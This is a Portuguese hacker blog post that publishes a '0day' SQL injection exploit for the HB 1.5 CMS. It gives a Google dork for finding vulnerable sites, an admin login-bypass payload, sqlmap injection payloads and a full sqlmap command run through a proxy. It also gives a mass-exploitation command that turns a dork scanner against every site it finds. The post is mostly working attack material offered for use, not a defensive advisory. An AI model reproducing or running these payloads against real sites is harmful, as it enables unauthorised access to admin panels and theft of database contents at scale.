Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador HB Web. Mostrar todas as postagens
Mostrando postagens com marcador HB Web. Mostrar todas as postagens

domingo, 17 de maio de 2015

Exploit 0day CMS HB 1.5


0day - Exploit php explora SQL INJECTION via( GET/POST) em CMS brasileiro HB feito pela empresa "Agência HB Web e Cia".

0day - Exploit php explora SQL INJECTION via( GET/POST) em CMS brasileiro HB feito pela empresa "Agência HB Web e Cia".


[+] Discoverer Author: M3t4tr0n
[+] FACEBOOK: https://www.facebook.com/M3T4TR0N
[+] EMAIL: [email protected]
[*] Thanks M3t4tr0n

# SCRIPT by: [ I N U R L-B R A S I L ] - [ By GoogleINURL ]
# EXPLOIT NAME: XPL 0day CMS HB 1.5 / INURL BRASIL
# AUTOR: Cleiton Pinheiro / Nick: googleINURL
# Email: [email protected]
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# EA:http://exploit4arab.net/author/248/Cleiton_Pinheiro
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil

Neither war between hackers, nor peace for the system.
------------------------------------------------------------------------------

[ + ] FAILURE REPORTED:
15/maio/2015

[ + ] Type:
ADMINISTRATIVE ACCESS PANEL

[ + ] Vendor:
http://www.hbwebecia.com.br/

[ + ] Version: 
HB 1.5

[ + ] Google Dork:
inurl:"base.php?pagina"

[ + ] FILE VULN:
/admin/logar.php

[ + ] POC:
(POST) http://{YOU_URL}/admin/logar.php?login='=' 'or'&senha='=' 'or'&Submit3=Entrar

[ + ] FILE VULN:
/base.php

[ + ] POC:
(GET) http://{YOU_URL}/base.php?pagina=noticia&id=1 + (SQLI)

[ + ] Exploração SQLMAP output:
# Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pagina=noticia&id=114' AND 1866=1866 AND 'qvCe'='qvCe

# Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: pagina=noticia&id=114' AND (SELECT * FROM (SELECT(SLEEP(5)))MPQc) AND 'MJVC'='MJVC

# Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: pagina=noticia&id=114' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x664a78565a7276576e76,0x71787a7871),NULL,NULL--

[ + ] USE SQLMAP:
./sqlmap.py -u 'http://{YOU_URL}/base.php?pagina=noticia&id=1'
--dbs --random-agent --level 3 --risk 2--proxy 'http://localhost:8118' 
--dbms='MySQL' --threads 3 --time-sec 10 --identify-waf --text-only 
--flush-session --batch

[ + ] EXECUTE: 
php xpl.php -t http://target.us

[ + ] FILE_OUTPUT :
HB.txt

PRINT OUTPUT:
[ + ] EXECUTE:  php xpl.php -t http://target.us

[ + ] Exploit: 
http://www.exploit4arab.net/exploits/1505 / http://pastebin.com/AY6sMthP

[ + ] EXPLOIT MASS USE SCANNER INURLBR:
php inurlbr.php --dork 'inurl:base.php?pagina" ext:php' -s output.txt --command-all 'php xpl.php -t _TARGET_'

PRINT OUTPUT:
[ + ] EXPLOIT MASS USE SCANNER INURLBR: php inurlbr.php --dork 'inurl:base.php?pagina" ext:php' -s output.txt--command-all 'php xpl.php -t _TARGET_'  PRINT OUTPUT:

More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR